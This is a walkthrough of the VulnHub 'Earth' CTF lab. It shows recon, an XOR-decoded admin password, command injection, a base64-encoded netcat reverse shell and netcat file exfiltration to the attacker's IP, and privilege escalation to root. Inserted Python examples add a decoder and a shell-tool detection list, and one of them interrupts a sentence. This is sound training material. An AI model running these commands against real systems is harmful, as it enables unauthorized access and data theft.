The Planets: Earth VulnHub CTF Walkthrough
Earth is an intentionally vulnerable CTF machine which consists of two flags. The author of this machine is SirFlash and it belongs to the series called The Planets.
This machine can be downloaded from The Planets: Earth - VulnHub.
After downloading and setting it up, it'll look like this:
Also don't forget to set up both the attacker and victim machines on the same network.
Then we have to fetch the IP address of the victim machine. It's easy to find when the victim machine is on the same network as ours. The command I used here is
sudo arp-scan -l
The next step is to do some recon on the IP address. We have to find open ports and services to collect more information. So the tool I'm going to use is Nmap and the command is
nmap -sV -A -Pn 192.168.29.196
Here, we can see there are some open ports and I'm going to concentrate on HTTP and HTTPS. So what I'll do next is visit the IP address in the web browser.
The website returns a Bad Request error, so I guessed there's another way to open it. I checked the nmap report again and found that there are DNS names to interact with the website, so I added those names to the /etc/hosts file.
Then I tried again to visit the website using the DNS names, which are earth.local and terratest.earth.local.
Then I looked for hidden directories or files on earth.local. For that, I used the Dirsearch tool and the command I used is
dirsearch -u earth.local -w /usr/share/wordlists/dirb/big.txt
That's how I found the admin panel on the earth.local website. Then I visited the /admin page in the web browser.
I clicked Log In and it led me to an admin login panel.
I didn't have the credentials to log in, but I tried some default credentials and that wasn't successful. Then I visited terratest.earth.local.
So I thought, why don't I do some directory listing on terratest.earth.local.
I found out that there's a robots.txt file and I visited it.
I guessed this might be a TXT file and my guess was right. I confirmed it by visiting testingnotes.txt in the web browser.
The contents of testingnotes.txt were useful. It told us that XOR encryption is in use and that there's a testdata.txt file on the web server. Also, the username for the admin portal is terra.
I tried a dictionary attack on the username "terra" using the rockyou.txt wordlist, but it wasn't successful. That's when I realized there's another way to find the password.
So I visited testdata.txt.
This information is crucial. Then I found out about CyberChef.
One of these three hashes will help find the password for the admin user "terra". The thing to do is:
Import "From Hex" and "XOR" in CyberChef and enter the XOR key, the same as in testdata.txt. Put the hash into the Input and hit BAKE! Hence we have the password earthclimatechangebad4humans.
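As an added illustration (not part of the original walkthrough), here is the same CyberChef recipe in Python, together with the "which of the three candidates is the password" step. The key and candidate strings are constructed stand-ins for the contents of testdata.txt, which are not reproduced here.

```python
import string

# Added example: CyberChef "From Hex" -> "XOR" as Python, plus picking the one
# candidate (out of several) that decodes to readable text. DEMO_KEY and
# DEMO_CANDIDATES are constructed for this demo, not the real testdata.txt.

def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key, as CyberChef's XOR op does."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def from_hex_then_xor(hex_text: str, key: str) -> bytes:
    """'From Hex' then 'XOR' with an ASCII key (the recipe in the text)."""
    return xor_with_key(bytes.fromhex(hex_text.replace(" ", "")), key.encode())

def looks_like_password(candidate: bytes) -> bool:
    """Plausible password: non-empty, printable ASCII, no control characters."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    return bool(candidate) and all(b in printable for b in candidate)

def pick_password(hex_candidates, key: str):
    """Return the first candidate that decodes to printable text, else None."""
    for hex_text in hex_candidates:
        decoded = from_hex_then_xor(hex_text, key)
        if looks_like_password(decoded):
            return decoded.decode()
    return None

# Constructed sample data: two junk candidates and one that really is the
# password XORed with the key, mirroring the three strings in testdata.txt.
DEMO_KEY = "constructed demo key"
DEMO_CANDIDATES = [
    "00ff10fe20fd30fc",  # junk: XOR with the key yields non-printable bytes
    xor_with_key(b"\x80\x81\x82\x83", DEMO_KEY.encode()).hex(),  # junk
    xor_with_key(b"earthclimatechangebad4humans", DEMO_KEY.encode()).hex(),
]

if __name__ == "__main__":
    print(pick_password(DEMO_CANDIDATES, DEMO_KEY))
```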
Then I used the username terra and password earthclimatechangebad4humans to login.
And I was redirected to a page which has an input field that processes command line commands. So I tried some commands like whoami, ls, pwd etc.
I thought, why shouldn't I try to get a reverse shell? So I tried to inject a one-line bash reverse shell payload. The command I tried was
But I failed to get a reverse shell connection. So I tried to find the flag file using this input field, and the command I used here was
locate flag
Actually the word "flag" in "locate flag" was a guess, and it worked. Hooray!!!
Then I read the flag using the command
cat /var/earth_web/user_flag.txt
So then I tried to read the root flag inside the root directory and I wasn't allowed because of low privileges. That's when I thought I should get a reverse shell. I know I had already tried that and it failed, but this time I'd encode the reverse shell payload and thought it might work.
So I created a netcat listener on my machine. The command was
nc -lnvp 53666
Then I encoded the reverse shell payload using a Base64 encoder, and the command I used here is
echo "nc -e /bin/bash 192.168.29.67 53666" | base64
Then I injected the encoded reverse shell into the web server via the input field, and the command I used here is
echo "bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjkuNjcgNTM2NjYK" | base64 -d | bash
Finally I got the reverse shell.
Then I tried to spawn a TTY shell using a Python one-liner.
python -c 'import pty; pty.spawn("/bin/bash")'
Got a bash shell. Let's change to the root directory.
Nope. Privileges weren't enough. We have to think of something else to escalate privileges and get root access. So I had the idea to look for SUID files with
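From the defender's side, the encoded payload above only worked because the input field looked at the raw string. As an added example (not part of the original walkthrough), this checker decodes any base64-looking token and inspects the decoded text as well; the sample commands are constructed.

```python
import base64
import binascii
import re

# Added example: detection for the "echo <base64> | base64 -d | bash" trick.
# A filter that only blacklists raw tokens misses payloads hidden in base64,
# so decode every base64-looking token and check the decoded text too.

SHELL_TOOL_RE = re.compile(r"\b(nc|ncat|bash|sh|python3?|perl|curl|wget)\b")
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_b64_tokens(text: str) -> list:
    """Return the decoded text of every valid base64 token in the input."""
    out = []
    for m in B64_TOKEN_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (bad length/padding): skip it
        out.append(raw.decode("utf-8", errors="ignore"))
    return out

def is_suspicious_command(cmd: str) -> bool:
    """Flag shell tooling in the raw command or inside any decoded token."""
    if "base64 -d" in cmd or "base64 --decode" in cmd:
        return True  # decode-then-execute is a red flag on its own
    texts = [cmd, *decode_b64_tokens(cmd)]
    return any(SHELL_TOOL_RE.search(t) for t in texts)

# Constructed sample inputs as the admin "CLI" field might receive them.
BENIGN = ["ls", "whoami", "pwd", "sync"]
# The walkthrough's blob on its own, without the "| base64 -d | bash" tail:
ENCODED_ONLY = "echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMjkuNjcgNTM2NjYK"

if __name__ == "__main__":
    for sample in BENIGN + [ENCODED_ONLY]:
        print(is_suspicious_command(sample), sample)
```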
find / -perm -u=s -type f 2>/dev/null
The reset_root file might be helpful. So I tried to read the file because I wanted to know how this script works. I used the command
cat /usr/bin/reset_root
The whole file appeared encrypted, and parts of it were in another format. So I tried to execute the script.
I think this script might be trying to reset the root password, and it failed due to some errors. Let's find those errors, but I can't do that here, so I'll send the file to my own machine. To do that, I have to start a new netcat listener on my machine and send the file to it. So first let's start a netcat listener; the command I used here is
nc -lnvp 4444 > reset_root
The second step is to send the file to my machine. For that, I used
nc 192.168.29.67 4444 < /usr/bin/reset_root
The file was sent successfully. Let's check it in our listener.
I successfully received the reset_root file. Now we have to give the file executable permissions, and the command I used here is
sudo chmod +x reset_root
The next step is to use the ltrace tool, which can be installed using
sudo apt-get install ltrace
Let's run ltrace on the reset_root file.
Here the script says the root password can only be reset once three files/directories exist. So let's create these three files. I used the mkdir command to create these directories.
All set. Now let's run the script.
The root password has been reset to "Earth" successfully. The next thing to do is switch to the root account using the credentials username "root" and password "Earth".
Successfully acquired root access. Let's find the root flag. It might be lying around in the /root directory, so let's move to that directory and list the files inside it.
I got root_flag.txt and read it.
I successfully completed The Planets: Earth CTF challenge. Hooray!!!